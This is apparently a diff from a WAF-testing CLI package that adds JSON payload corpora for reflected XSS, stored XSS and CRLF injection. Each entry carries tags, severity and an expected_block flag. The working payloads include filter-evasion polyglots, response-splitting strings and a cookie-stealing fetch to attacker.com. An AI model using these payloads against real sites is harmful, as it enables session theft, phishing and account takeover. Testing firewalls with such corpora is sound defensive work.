@waftester/cli 2.8.0

package/payloads/community/xss/reflected.json

@@ -0,0 +1,187 @@
+[
+  {
+      "id": "XSS-REFL-001",
+      "payload": "<script>alert('XSS')</script>",
+      "tags": [
+        "basic",
+        "reflected",
+        "quick"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Classic reflected XSS",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-REFL-002",
+      "payload": "<img src=x onerror=alert('XSS')>",
+      "tags": [
+        "basic",
+        "img",
+        "quick"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Image tag with onerror event",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-REFL-003",
+      "payload": "<svg onload=alert('XSS')>",
+      "tags": [
+        "svg",
+        "quick"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "SVG-based XSS",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-REFL-004",
+      "payload": "javascript:alert('XSS')",
+      "tags": [
+        "protocol",
+        "quick"
+    ],
+      "expected_block": true,
+      "severity_hint": "Medium",
+      "notes": "JavaScript protocol handler",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-REFL-005",
+      "payload": "<iframe src=\"javascript:alert('XSS')\">",
+      "tags": [
+        "iframe",
+        "protocol"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Iframe with javascript protocol",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-REFL-006",
+      "payload": "<body onload=alert('XSS')>",
+      "tags": [
+        "body",
+        "event"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Body tag event handler",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-REFL-007",
+      "payload": "<input onfocus=alert('XSS') autofocus>",
+      "tags": [
+        "input",
+        "autofocus"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Input with autofocus trigger",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-REFL-008",
+      "payload": "%3Cscript%3Ealert('XSS')%3C%2Fscript%3E",
+      "tags": [
+        "encoded",
+        "basic",
+        "quick"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "URL-encoded script tag",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-REFL-009",
+      "payload": "<scr<script>ipt>alert('XSS')</scr</script>ipt>",
+      "tags": [
+        "obfuscation",
+        "evasion"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Tag splitting evasion",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-001",
+      "payload": "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//\\x3e",
+      "tags": [
+        "polyglot",
+        "obfuscation"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "XSS polyglot - multiple context bypass",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-REFL-010",
+      "payload": "<details open ontoggle=alert('XSS')>",
+      "tags": [
+        "details",
+        "html5"
+    ],
+      "expected_block": true,
+      "severity_hint": "Medium",
+      "notes": "HTML5 details tag",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-REFL-011",
+      "payload": "<marquee onstart=alert('XSS')>",
+      "tags": [
+        "marquee",
+        "legacy"
+    ],
+      "expected_block": true,
+      "severity_hint": "Medium",
+      "notes": "Legacy marquee tag",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-REFL-012",
+      "payload": "<math><mtext></mtext><mglyph><style></math><img src onerror=alert('XSS')>",
+      "tags": [
+        "mathml",
+        "mutation"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "MathML mutation XSS",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-002",
+      "payload": "'\"><img src=x onerror=alert(1)>",
+      "tags": [
+        "polyglot",
+        "attribute-escape",
+        "quick"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "XSS polyglot - escapes single quote, double quote, and tag context",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-003",
+      "payload": "javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(1)//'>",
+      "tags": [
+        "polyglot",
+        "multi-context",
+        "advanced"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Advanced XSS polyglot - breaks out of multiple contexts (title, style, textarea, script, xmp)",
+      "category": "XSS"
+  }
+]

package/payloads/community/xss/stored.json

@@ -0,0 +1,330 @@
+[
+  {
+      "id": "XSS-STOR-050",
+      "payload": "<script>alert(document.domain)</script>",
+      "tags": [
+        "stored",
+        "comment",
+        "basic",
+        "quick"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Stored XSS in comment field - basic script tag",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-STOR-051",
+      "payload": "<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>",
+      "tags": [
+        "stored",
+        "cookie-theft",
+        "exfiltration"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Stored XSS with cookie exfiltration via fetch",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-STOR-052",
+      "payload": "<svg><animate onbegin=alert(1) attributeName=x dur=1s>",
+      "tags": [
+        "stored",
+        "svg",
+        "animate"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Stored XSS via SVG animate element",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-STOR-053",
+      "payload": "<style>@import'javascript:alert(1)';</style>",
+      "tags": [
+        "stored",
+        "style",
+        "import"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Stored XSS via CSS @import with javascript protocol",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-STOR-054",
+      "payload": "<link rel=stylesheet href='javascript:alert(1)'>",
+      "tags": [
+        "stored",
+        "link",
+        "stylesheet"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Stored XSS via link stylesheet with javascript protocol",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-STOR-055",
+      "payload": "<object data='javascript:alert(1)'>",
+      "tags": [
+        "stored",
+        "object",
+        "data"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Stored XSS via object data attribute",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-STOR-056",
+      "payload": "<embed src='javascript:alert(1)'>",
+      "tags": [
+        "stored",
+        "embed"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Stored XSS via embed element",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-STOR-057",
+      "payload": "<meta http-equiv=refresh content='0;url=javascript:alert(1)'>",
+      "tags": [
+        "stored",
+        "meta",
+        "refresh"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Stored XSS via meta refresh redirect",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-STOR-058",
+      "payload": "<base href='javascript:alert(1)//'>",
+      "tags": [
+        "stored",
+        "base",
+        "href"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Stored XSS via base tag hijacking",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-STOR-059",
+      "payload": "<form action='javascript:alert(1)'><input type=submit value=Click></form>",
+      "tags": [
+        "stored",
+        "form",
+        "action"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Stored XSS via form action attribute",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-STOR-060",
+      "payload": "<button formaction='javascript:alert(1)'>Click</button>",
+      "tags": [
+        "stored",
+        "button",
+        "formaction"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Stored XSS via button formaction",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-STOR-061",
+      "payload": "<video><source onerror='alert(1)' src=x></video>",
+      "tags": [
+        "stored",
+        "video",
+        "source"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Stored XSS via video source onerror",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-STOR-062",
+      "payload": "<audio src=x onerror=alert(1)>",
+      "tags": [
+        "stored",
+        "audio",
+        "onerror"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Stored XSS via audio onerror event",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-STOR-063",
+      "payload": "<track src=x onerror=alert(1)>",
+      "tags": [
+        "stored",
+        "track",
+        "media"
+    ],
+      "expected_block": true,
+      "severity_hint": "Medium",
+      "notes": "Stored XSS via track element onerror",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-STOR-064",
+      "payload": "<script>setTimeout('alert(1)', 10000)</script>",
+      "tags": [
+        "stored",
+        "delayed",
+        "setTimeout"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Stored XSS with 10 second delay (delayed trigger)",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-STOR-065",
+      "payload": "<img src=x onerror=\"this.onerror=null; setTimeout('alert(1)', 5000)\">",
+      "tags": [
+        "stored",
+        "delayed",
+        "anti-detection"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Stored XSS with delayed trigger and error clearing",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-STOR-066",
+      "payload": "{{constructor.constructor('alert(1)')()}}",
+      "tags": [
+        "stored",
+        "template",
+        "angular",
+        "ssti"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Stored XSS via AngularJS template injection",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-STOR-067",
+      "payload": "${alert(document.domain)}",
+      "tags": [
+        "stored",
+        "template",
+        "es6",
+        "template-literal"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Stored XSS via ES6 template literal injection",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-STOR-068",
+      "payload": "<textarea><script>alert(1)</script></textarea>",
+      "tags": [
+        "stored",
+        "textarea",
+        "context-escape"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Stored XSS escaping textarea context",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-STOR-069",
+      "payload": "<noscript><style></noscript><img src=x onerror=alert(1)>",
+      "tags": [
+        "stored",
+        "noscript",
+        "style-escape"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Stored XSS via noscript context escape",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-STOR-070",
+      "payload": "<select><option><script>alert(1)</script></option></select>",
+      "tags": [
+        "stored",
+        "select",
+        "option"
+    ],
+      "expected_block": true,
+      "severity_hint": "Medium",
+      "notes": "Stored XSS in select option (limited contexts)",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-STOR-071",
+      "payload": "<!--[if gte IE 4]><script>alert(1)</script><![endif]-->",
+      "tags": [
+        "stored",
+        "conditional-comment",
+        "ie"
+    ],
+      "expected_block": true,
+      "severity_hint": "Medium",
+      "notes": "Stored XSS via IE conditional comments",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-STOR-072",
+      "payload": "<svg><foreignObject><body onload=alert(1)></foreignObject></svg>",
+      "tags": [
+        "stored",
+        "svg",
+        "foreignObject"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Stored XSS via SVG foreignObject",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-STOR-073",
+      "payload": "<math><mtext><img src=x onerror=alert(1)></mtext></math>",
+      "tags": [
+        "stored",
+        "mathml",
+        "mtext"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Stored XSS via MathML mtext element",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-STOR-074",
+      "payload": "<iframe srcdoc='<script>alert(parent.document.domain)</script>'></iframe>",
+      "tags": [
+        "stored",
+        "iframe",
+        "srcdoc",
+        "parent-access"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Stored XSS via iframe srcdoc with parent access",
+      "category": "XSS"
+  }
+]

package/payloads/crlf-injection.json

@@ -0,0 +1,182 @@
+[
+    {
+      "id": "crlf-001",
+      "payload": "%0d%0aSet-Cookie:crlf=injection",
+      "tags": ["crlf", "header-injection", "session-fixation"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "Basic CRLF injection - set arbitrary cookie",
+      "category": "Injection"
+    },
+    {
+      "id": "crlf-002",
+      "payload": "%0d%0aLocation:%20http://evil.com",
+      "tags": ["crlf", "header-injection", "open-redirect"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "CRLF injection for open redirect via Location header",
+      "category": "Injection"
+    },
+    {
+      "id": "crlf-003",
+      "payload": "%0aSet-Cookie:crlf=injection",
+      "tags": ["crlf", "header-injection", "lf-only"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "LF-only injection - works on some servers",
+      "category": "Injection"
+    },
+    {
+      "id": "crlf-004",
+      "payload": "%0dSet-Cookie:crlf=injection",
+      "tags": ["crlf", "header-injection", "cr-only"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "CR-only injection - works on some servers",
+      "category": "Injection"
+    },
+    {
+      "id": "crlf-005",
+      "payload": "/%23%0aSet-Cookie:crlf=injection",
+      "tags": ["crlf", "header-injection", "fragment-bypass"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "CRLF with fragment character bypass",
+      "category": "Injection"
+    },
+    {
+      "id": "crlf-006",
+      "payload": "/%23%0d%0aSet-Cookie:crlf=injection",
+      "tags": ["crlf", "header-injection", "fragment-bypass"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "CRLF with fragment character and full CRLF",
+      "category": "Injection"
+    },
+    {
+      "id": "crlf-007",
+      "payload": "%25%30%61Set-Cookie:crlf=injection",
+      "tags": ["crlf", "header-injection", "double-encode"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "Double URL-encoded LF",
+      "category": "Injection"
+    },
+    {
+      "id": "crlf-008",
+      "payload": "%25250aSet-Cookie:crlf=injection",
+      "tags": ["crlf", "header-injection", "triple-encode"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "Triple URL-encoded LF",
+      "category": "Injection"
+    },
+    {
+      "id": "crlf-009",
+      "payload": "/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection",
+      "tags": ["crlf", "header-injection", "path-traversal"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "CRLF with path traversal prefix",
+      "category": "Injection"
+    },
+    {
+      "id": "crlf-010",
+      "payload": "/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection",
+      "tags": ["crlf", "header-injection", "path-traversal"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "CRLF with alternate path traversal",
+      "category": "Injection"
+    },
+    {
+      "id": "crlf-011",
+      "payload": "/%u000aSet-Cookie:crlf=injection",
+      "tags": ["crlf", "header-injection", "unicode"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "Unicode-encoded LF (%u notation)",
+      "category": "Injection"
+    },
+    {
+      "id": "crlf-012",
+      "payload": "/%3f%0d%0aSet-Cookie:crlf=injection",
+      "tags": ["crlf", "header-injection", "query-string"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "CRLF with query string prefix",
+      "category": "Injection"
+    },
+    {
+      "id": "crlf-013",
+      "payload": "%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html>Phished</html>",
+      "tags": ["crlf", "http-response-splitting", "phishing"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "HTTP Response Splitting - inject entire fake response",
+      "category": "Injection"
+    },
+    {
+      "id": "crlf-014",
+      "payload": "%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a",
+      "tags": ["crlf", "xss", "response-splitting"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "CRLF to XSS by disabling XSS protection",
+      "category": "Injection"
+    },
+    {
+      "id": "crlf-015",
+      "payload": "%E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:",
+      "tags": ["crlf", "header-injection", "utf8-bypass"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "UTF-8 CRLF bypass (嘊嘍 characters stripped to 0A 0D)",
+      "category": "Injection"
+    },
+    {
+      "id": "crlf-016",
+      "payload": "%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert(1)%E5%98%BE",
+      "tags": ["crlf", "xss", "utf8-bypass"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "UTF-8 CRLF + XSS (嘊嘍嘼...嘾)",
+      "category": "Injection"
+    },
+    {
+      "id": "crlf-017",
+      "payload": "\\r\\nSet-Cookie:crlf=injection",
+      "tags": ["crlf", "header-injection", "escaped"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "Escaped CRLF characters",
+      "category": "Injection"
+    },
+    {
+      "id": "crlf-018",
+      "payload": "*))%00%0d%0aSet-Cookie:crlf=injection",
+      "tags": ["crlf", "header-injection", "null-byte"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "CRLF with null byte prefix",
+      "category": "Injection"
+    },
+    {
+      "id": "crlf-019",
+      "payload": "%0d%0aX-Injected-Header:%20test",
+      "tags": ["crlf", "header-injection", "custom-header"],
+      "expected_block": true,
+      "severity_hint": "medium",
+      "notes": "CRLF to inject custom header",
+      "category": "Injection"
+    },
+    {
+      "id": "crlf-020",
+      "payload": "%0d%0aAccess-Control-Allow-Origin:%20*",
+      "tags": ["crlf", "header-injection", "cors"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "CRLF to inject CORS header",
+      "category": "Injection"
+    }
+]